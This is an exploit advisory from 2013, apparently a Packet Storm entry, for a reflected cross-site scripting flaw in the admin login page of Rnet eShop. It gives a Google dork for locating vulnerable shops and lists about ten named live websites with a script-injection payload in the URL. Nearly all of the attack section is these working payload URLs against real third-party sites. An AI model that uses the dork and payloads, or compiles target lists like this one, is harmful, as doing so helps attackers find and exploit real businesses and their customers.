Rnet eShop Cross Site Scripting

2013-09-03T00:00:00
ID PACKETSTORM:123060
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-09-03T00:00:00

Description

                                        
                                            ` _ __ _____ _____  
\ \ / / / ____| / ____|  
\ V / | (___ | (___  
> < \___ \ \___ \  
/ . \ ____) | ____) |  
/_/ \_\ |_____/ |_____/  
#******************************************************************  
# [+] Exploit Title : Rnet eShop Cross site scripting vulnerability  
#  
# [+] Software link : http://www.rnet.no  
#  
# [+] Exploit Author : Ashiyane Digital Security Team  
#  
# [+] Tested on: Windows 7 , Linux  
#  
# [+] Google Dork : intext:" Powered by Rnet eShop"  
#  
# [+] Date: 2013/09/01  
#  
--------------------------------------------------------------------  
# [+] Exploit :  
#  
# [+] Location : [Target]/_admin_login.asp?e=&n=[xss]  
#  
#-------  
# Proof:  
#-------  
#  
# http://www.klamydia.no/_admin_login.asp?e=&n="/><script>alert(1);</script>  
#  
# http://www.glamourtopz.com/_admin_login.asp?e=&n=  
"/><script>alert(1);</script>  
#  
# http://www.smart-alarm.no/_admin_login.asp?e=&n=  
"/><script>alert(1);</script>  
#  
# http://www.testselv.no/_admin_login.asp?e=&n="/><script>alert(1);</script>  
#  
# http://www.urmaker-ronning.no/_admin_login.asp?e=&n=  
"/><script>alert(1);</script>  
#  
# http://www.galleri-lindesnes.no/_admin_login.asp?e=&n=  
"/><script>alert(1);</script>  
#  
# http://www.vareshop.no/_admin_login.asp?e=&n="/><script>alert(1);</script>  
#  
# http://tarmkreft.no/_admin_login.asp?e=&n="/><script>alert(1);</script>  
#  
# http://www.glamourtopz.com/_admin_login.asp?e=&n=  
"/><script>alert(1);</script>  
#  
# http://www.perleshop.no/_admin_login.asp?e=&n=  
"/><script>alert(1);</script>  
#  
#  
######################  
discovered by : ACC3SS  
######################  
`